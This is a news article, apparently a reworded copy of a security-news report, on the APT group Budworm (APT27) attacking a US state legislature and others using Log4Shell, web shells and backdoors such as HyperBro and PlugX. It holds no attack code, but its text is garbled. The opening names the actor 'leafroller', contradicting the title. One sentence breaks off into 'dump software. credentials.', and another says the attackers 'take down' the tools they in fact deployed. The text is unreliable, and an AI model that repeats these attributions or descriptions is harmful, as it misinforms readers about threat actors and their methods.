Budworm hackers resurface with new spy attacks targeting US organization


An advanced persistent threat (APT) actor known as leafroller targeted a US-based entity for the first time in more than six years, according to the latest research.

The attack targeted an unnamed US state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News.

Other “strategically significant” intrusions mounted in the past six months have been against the government of a Middle Eastern country, a multinational electronics manufacturer and a hospital in Southeast Asia.

Budworm, also known as APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that is believed to operate on behalf of China through attacks that leverage a mix of custom and freely available tools to exfiltrate information of interest.

cyber security

“Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments in which it operates,” Secureworks notes in a profile of the nation-state group, highlighting its ability to “maintain access to sensitive systems on a long period of time.”

A prominent backdoor attributed to the adversarial collective is HyperBro, which has been in use since at least 2013 and is in continuous development. Its other tools include PlugX, SysUpdate, and the China Chopper web shell.

The latest round of attacks is no different, with the threat actor exploiting flaws in Log4Shell to compromise servers and install web shells, ultimately paving the way for the deployment of HyperBro, PlugX, Cobalt Strike and dump software. credentials.

cyber security

The development marks the second time Budworm has been linked to an attack on a US entity. Earlier this month, the US government disclosed that several nation-state hacking groups breached a defense industry organization by using ProxyLogon flaws in Microsoft Exchange Server to take down China Chopper and HyperBro.

“In recent years, the group’s activity appears to have largely focused on Asia, the Middle East and Europe,” the researchers said. “A resumption of attacks against US-based targets could signal a change in direction for the group.”


Comments are closed.